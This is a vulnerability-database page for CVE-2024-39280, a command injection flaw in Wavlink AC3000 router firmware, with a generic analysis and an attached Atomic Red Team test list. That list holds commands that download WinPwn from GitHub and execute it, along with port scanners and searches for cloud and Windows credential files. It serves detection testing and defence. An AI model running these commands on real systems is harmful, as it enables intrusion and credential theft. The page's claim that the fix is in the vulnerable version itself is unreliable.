CVE-2024-39280
Overview
This vulnerability is a command injection flaw rooted in insufficient validation of input parameters within the set_smb_cfg() function of the nas.cgi endpoint in Wavlink AC3000 firmware M33A8.V5030.210505. The nas.cgi component processes configuration requests, and improper sanitization allows crafted HTTP requests to manipulate system commands. The flaw arises from the external control of configuration settings, enabling injection of arbitrary commands via authenticated HTTP requests.
Vulnerability Description
An external config control vulnerability exists in the nas.cgi set_smb_cfg() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Impact
An attacker with valid authentication credentials can execute arbitrary commands on the affected device remotely, enabling full control over the system. This can lead to unauthorized configuration changes, data compromise, or persistent backdoor installation. The attack requires network access and valid user privileges (PR:H), but no user interaction is needed. The vulnerability impacts confidentiality, integrity, and availability (C:H/I:H/A:H) as indicated by the CVSS vector.
Solution
Wavlink has released firmware updates addressing this vulnerability in version M33A8.V5030.210505. Administrators should upgrade affected Wavlink AC3000 devices to the latest firmware as detailed in the Talos Intelligence advisory TALOS-2024-2055 (https://talosintelligence.com/vulnerability_reports/TALOS-2024-2055). Follow vendor instructions precisely for patch installation to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Wavlink AC3000 M33A8 firmware is characterized as an external configuration control issue, specifically within the nas.cgi set_smb_cfg() functionality. This flaw allows an attacker to craft a malicious HTTP request that can lead to arbitrary command execution on the affected device. The underlying cause of this vulnerability stems from inadequate input validation and insufficient access controls, which enable unauthorized users to execute commands that should be restricted to legitimate administrative functions. This lack of proper security measures creates a significant risk, as it allows attackers to manipulate device settings and potentially gain control over the network environment.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving authenticated HTTP requests. An attacker must first gain access to the device, which may be achieved through social engineering, credential theft, or exploiting other vulnerabilities within the network. Once authenticated, the attacker can send specially crafted requests to the nas.cgi interface, triggering the execution of arbitrary commands on the device. This exploitation can lead to a range of malicious activities, including the installation of malware, data exfiltration, or even the creation of backdoors for persistent access. The ease of exploitation, combined with the high impact potential, makes this vulnerability particularly concerning for organizations relying on the affected firmware.
The real-world impact of this vulnerability can be severe, especially for businesses that utilize the Wavlink AC3000 M33A8 for critical operations. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential damage to the organization's reputation. Furthermore, the ability to execute arbitrary commands may allow attackers to pivot to other systems within the network, escalating their access and increasing the overall risk to the organization. The financial implications of such an incident could be significant, encompassing costs related to incident response, remediation, and potential regulatory fines, as well as the long-term effects of reputational damage.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions is crucial, as vendors often release patches to address known vulnerabilities. Additionally, organizations should employ network segmentation to limit the exposure of critical devices to untrusted networks and implement strict access controls to ensure that only authorized personnel can interact with the device's management interfaces. Monitoring network traffic for unusual patterns or unauthorized access attempts can also aid in early detection of exploitation attempts. Furthermore, educating employees about the importance of strong authentication practices and the risks associated with social engineering can help reduce the likelihood of initial access by attackers.
In conclusion, the external configuration control vulnerability in the Wavlink AC3000 M33A8 firmware poses a significant threat to organizations that utilize this device. The potential for arbitrary command execution through authenticated HTTP requests highlights the critical need for robust security measures. By understanding the technical details of the vulnerability, recognizing potential attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this and similar vulnerabilities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wavlink | Wl-Wn533a8 Firmware | m33a8.v5030.210505 |
cpe:2.3:o:wavlink:wl-wn533a8_firmware:m33a8.v5030.210505:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-39280 |
| talosintelligence.com |
GitHub CVE
|
https://talosintelligence.com/vulnerability_reports/TALOS-2024-2055 |
| talosintelligence.com |
NVD API
Exploit
Third Party Advisory
|
https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2055 |